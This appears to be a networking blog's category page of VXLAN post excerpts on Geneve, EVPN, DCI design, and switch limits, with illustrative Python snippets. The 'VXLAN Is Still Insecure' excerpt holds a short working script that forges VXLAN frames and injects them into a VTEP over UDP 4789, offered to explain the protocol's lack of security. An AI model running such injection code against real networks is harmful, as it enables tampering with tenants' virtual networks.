Category: VXLAN

VMware NSX-T and Geneve Q&A

A Network Artist left a lengthy comment on my Brief History of VMware NSX blog post. He raised a number of interesting topics, so I decided to write my replies as a separate blog post.

Using Geneve is an interesting choice, and while the approach has its own pros and cons, I would stick with VXLAN if I had to recommend something to someone, for a few good reasons.

The main reason I see for NSX-T using Geneve instead of VXLAN is the need for additional header fields to carry metadata around, and to implement Network Service Header (NSH) for east-west service insertion.
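
To put that in perspective, here's a minimal sketch of the two header formats in Python, based on the field layouts in RFC 7348 and RFC 8926 (the option class/type values in the example are made up): VXLAN is a fixed eight-byte header with nothing but flags and a VNI, while Geneve can append arbitrary TLV options to carry metadata with every packet.

    import struct

    def vxlan_header(vni: int) -> bytes:
        # RFC 7348: eight fixed bytes -- flags (I bit set), reserved
        # fields, 24-bit VNI. No room for per-packet metadata.
        return struct.pack("!II", 0x08 << 24, vni << 8)

    def geneve_header(vni: int, options: bytes = b"") -> bytes:
        # RFC 8926: same 24-bit VNI, but a variable-length block of
        # option TLVs follows the eight fixed bytes.
        assert len(options) % 4 == 0
        opt_len = len(options) // 4                  # in 4-byte words
        fixed = struct.pack("!BBH", opt_len & 0x3F,  # Ver=0 | Opt Len
                            0,                       # O/C flags + reserved
                            0x6558)                  # payload: Ethernet
        return fixed + struct.pack("!I", vni << 8) + options

    def geneve_option(opt_class: int, opt_type: int, data: bytes) -> bytes:
        # One TLV -- the extension point where metadata (for example an
        # NSH-like service-path identifier) rides along with the packet.
        assert len(data) % 4 == 0
        return struct.pack("!HBB", opt_class, opt_type, len(data) // 4) + data

    # Hypothetical option class/type carrying a 32-bit service-path tag:
    hdr = geneve_header(5001, geneve_option(0x0104, 1, struct.pack("!I", 42)))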


Don't Base Your Design on Vendor Marketing

Remember how Arista promoted VXLAN coupled with deep-buffer switches as the perfect DCI solution a few years ago? Someone took Arista’s marketing too literally, ran with the idea, and combined VXLAN-based DCI with a traditional MLAG+STP data center fabric.

While I love that they wrote a blog post documenting their experience (if only more people would do that), it doesn’t change the fact that the design contains the worst of both worlds.

Here are just a few things that went wrong:


Building Fabric Infrastructure for an OpenStack Private Cloud

An attendee in my Building Next-Generation Data Center online course was asked to deploy numerous relatively small OpenStack cloud instances and wanted to select the optimal virtual networking technology. Not surprisingly, every $vendor had just the right answer, including Arista:

We’re considering moving from hypervisor-based overlays to ToR-based overlays using Arista’s CVX for approximately 2000 VLANs.

As I explained in Overlay Virtual Networking, Networking in Private and Public Clouds, and Designing Private Cloud Infrastructure (plus several presentations), you have three options to implement virtual networking in private clouds:


Private VLANs With VXLAN

I got this remark from a reader after he read the VXLAN and Q-in-Q blog post:

Another area with an EVPN/VXLAN feature gap is private VLANs with VXLAN. They’re not supported on either Nexus or Juniper switches.

I have one word on using private VLANs in 2019: Don’t. They are messy and complicated to maintain (not to mention how exciting it gets to combine virtual and physical switches).


Loop Avoidance in VXLAN Networks

Antonio Boj sent me this interesting challenge:

Is there any way to avoid, prevent or at least mitigate bridging loops when using VXLAN with EVPN? Spanning tree is not supported when using VXLAN encapsulation, so I was hoping to use EVPN duplicate MAC detection.

MAC move dampening (or anything similar) doesn’t help if you have a forwarding loop. You might be able to use it to identify that there’s a loop, but that’s it… and while you’re doing that, your network is melting down.
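
If you want to see why, here's a toy model of duplicate-MAC detection, loosely following the RFC 7432 mechanism (the thresholds are made-up illustrative values). Note what it does: it notices a MAC flapping between VTEPs after the fact, and does nothing to stop the flooded frames that are already looping.

    import time
    from collections import defaultdict

    # Made-up thresholds: a MAC that moves N_MOVES times within
    # WINDOW seconds is declared a duplicate and frozen.
    N_MOVES, WINDOW = 5, 180

    class MacMoveDetector:
        def __init__(self):
            self.location = {}               # MAC -> current VTEP
            self.moves = defaultdict(list)   # MAC -> move timestamps
            self.frozen = set()

        def learn(self, mac, vtep):
            if mac in self.location and self.location[mac] != vtep:
                now = time.monotonic()
                recent = [t for t in self.moves[mac] if now - t < WINDOW]
                recent.append(now)
                self.moves[mac] = recent
                if len(recent) >= N_MOVES and mac not in self.frozen:
                    # Detection only: while we were counting moves,
                    # every flooded frame kept circling the loop.
                    self.frozen.add(mac)
                    print(f"duplicate MAC {mac} frozen")
            self.location[mac] = vtep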


Q-in-Q Support in Multi-Site EVPN

One of my subscribers sent me a question along these lines (heavily abridged):

My customer runs a colocation business and has to provide L2 connectivity between racks, sometimes even across multiple data centers. They were using Q-in-Q to deliver that in a traditional fabric and would like to replace that with multi-site EVPN fabric with ~100 ToR switches in each data center. However, Cisco doesn’t support Q-in-Q with multi-site EVPN. Any ideas?

As Lukas Krattiger explained in his part of the Multi-Site Leaf-and-Spine Fabrics section of the Leaf-and-Spine Fabric Architectures webinar, multi-site EVPN (VXLAN-to-VXLAN bridging) is hard. Don’t expect miracles like Q-in-Q over VNI any time soon ;)
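
To illustrate the challenge, here's the double-tagged frame such a colocation provider has to push across the fabric (MAC addresses and VLAN IDs below are made up). The ingress VTEP would have to map the outer S-tag to a VNI and carry the inner C-tag as opaque payload, a classification-and-rewrite combination many VTEP implementations simply don't do.

    import struct

    def vlan_tag(tpid, vid):
        # PCP/DEI bits left at zero for brevity
        return struct.pack("!HH", tpid, vid & 0x0FFF)

    # Double-tagged (Q-in-Q) customer frame: 802.1ad S-tag outside,
    # 802.1Q C-tag inside.
    dst, src = bytes(6), bytes.fromhex("02abcdef0001")
    frame = (dst + src
             + vlan_tag(0x88A8, 100)        # provider S-tag
             + vlan_tag(0x8100, 42)         # customer C-tag
             + struct.pack("!H", 0x0800)    # inner EtherType: IPv4
             + bytes(46))                   # padded payload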


Interview: Active-Active Data Centers With VXLAN and EVPN

Christoph Jaggi asked me a few questions about using VXLAN with EVPN to build data center fabrics and interconnects (including active/active data centers). The German version was published on Inside-IT; here’s the English version.

He started with an obvious one:

What is an active-active data center, and why would I want to use it?

Numerous organizations have multiple data centers for load sharing or disaster recovery purposes. They could use one of their data centers and have the other(s) as warm or cold standby (active/backup setup) or use all data centers at the same time (active/active).


OMG, VXLAN Is Still Insecure

A friend of mine told me about a “VXLAN is insecure, the sky is falling” presentation from RIPE-77, which claims that you can (under certain circumstances) inject packets into VXLAN virtual networks from the Internet.

Welcome back, Captain Obvious. Anyone looking at the VXLAN packet could immediately figure out that there’s no security in VXLAN. I pointed that out several times in my blog posts and presentations, including Cloud Computing Networking (EuroNOG, September 2011) and NSX Architecture webinar (August 2013).
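
In case you're wondering how hard the injection is: assuming a VTEP that accepts VXLAN packets from any source, the whole attack boils down to a few lines of Python (the address below is from the documentation range; treat this as an illustration, not a pentesting tool).

    import socket, struct

    # Documentation-range address standing in for an Internet-reachable
    # VTEP. The VXLAN header carries no authentication whatsoever:
    # anyone who can deliver UDP/4789 to the VTEP and guess (or scan)
    # the 24-bit VNI can hand it a forged Ethernet frame.
    VTEP, VNI = "192.0.2.10", 5001

    forged_frame = bytes(64)                   # stand-in inner frame
    packet = struct.pack("!II", 0x08 << 24, VNI << 8) + forged_frame

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(packet, (VTEP, 4789))          # IANA-assigned VXLAN port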


VXLAN and EVPN on Hypervisor Hosts

One of my readers sent me a series of questions regarding a new cloud deployment where the cloud implementers want to run VXLAN and EVPN on the hypervisor hosts:

I am currently working on a leaf-and-spine VXLAN+EVPN PoC. At the same time, the systems team in my company is working on building a CloudStack platform and is insisting on using VXLAN on the compute nodes, even to the point of using BGP for inter-VXLAN traffic on the nodes.

Using VXLAN (or GRE) encap/decap on the hypervisor hosts is nothing new. That’s how NSX and many OpenStack implementations work.
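
For reference, here's approximately what “VXLAN on the compute node” looks like on a Linux host, driven from Python purely for illustration (interface names, VNI, and addresses are made up, and the commands need root):

    import subprocess

    def sh(cmd):
        subprocess.run(cmd.split(), check=True)

    # Hypothetical values: VNI 100, VTEP address 10.0.0.1 on a loopback.
    # 'nolearning' disables flood-and-learn; an EVPN control plane (for
    # example FRR advertising type-2 routes) populates the FDB instead.
    sh("ip link add vxlan100 type vxlan id 100 local 10.0.0.1 "
       "dstport 4789 nolearning")
    sh("ip link add br100 type bridge")
    sh("ip link set vxlan100 master br100")
    sh("ip link set vxlan100 up")
    sh("ip link set br100 up")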


VXLAN Broadcast Domain Size Limitations

One of the attendees of my Building Next-Generation Data Center online course tried to figure out whether you can build larger broadcast domains with VXLAN than you could with VLANs. Here’s what he sent me:

I’m trying to understand the differences or similarities between VLAN and VXLAN technologies in view of (*cast) domain limitations.

There’s no difference between the two on the client-facing side. VXLAN is just an encapsulation technology and doesn’t change how bridging works at all (read also part 2 of that story).


VXLAN Limitations of Data Center Switches

One of my readers found a Cumulus Networks article that explains why you can’t have more than a few hundred VXLAN-based VLAN segments on every port of a 48-port Trident-2 data center switch. That article has unfortunately disappeared in the meantime, and even the Wayback Machine doesn’t have a copy.

Expect to see similar limitations in most other chipsets. There’s a huge gap between the millions of segments enabled by the 24-bit VXLAN Network Identifier and the reality of switching silicon. Most switching hardware is also limited to 4K VLANs.
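
The arithmetic is straightforward, assuming the common approach of mapping each VNI to an internal VLAN in the forwarding pipeline (check your chipset's documentation for the actual limits):

    # Back-of-the-envelope: VXLAN numbering space versus what a
    # VLAN-based switching pipeline can actually instantiate.
    vni_space  = 2 ** 24     # 16,777,216 possible VXLAN segments
    vlan_space = 2 ** 12     # 4,096 VLAN IDs (a few of them reserved)

    # A chipset that maps each VNI to an internal VLAN caps the whole
    # switch at ~4K segments; if it also burns a (port, VLAN) hardware
    # entry per segment per port, 48 ports tighten the budget further.
    print(vni_space // vlan_space)   # 4096 -- the size of the gap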

Could We Build an IXP on Top of VXLAN Infrastructure?

Andy sent me this question:

I'm currently playing around with BGP & VXLANs and wondering: is there anything preventing someone from building a virtual IXP with VXLAN? It would be a large layer-2 network, but why has nobody built one so far, and why don't internet exchanges offer this?

There was at least one IXP running on top of VXLAN. I wanted to do a podcast about it with the people who helped them build it in early 2015, but one of them got a gag order.


Are VXLAN-Based Large Layer-2 Domains Safer?

One of my readers was wondering about the stability and scalability of large layer-2 domains implemented with VXLAN. He wrote:

If common BUM traffic (e.g. ARP) is being handled/localized by the network (e.g. NSX or ACI), and if we are managing what traffic hosts can send with micro-segmentation-style filtering that blocks broadcast/multicast, are large layer-2 domains still a recipe for disaster?

There are three major (fundamental) problems with large L2 domains:
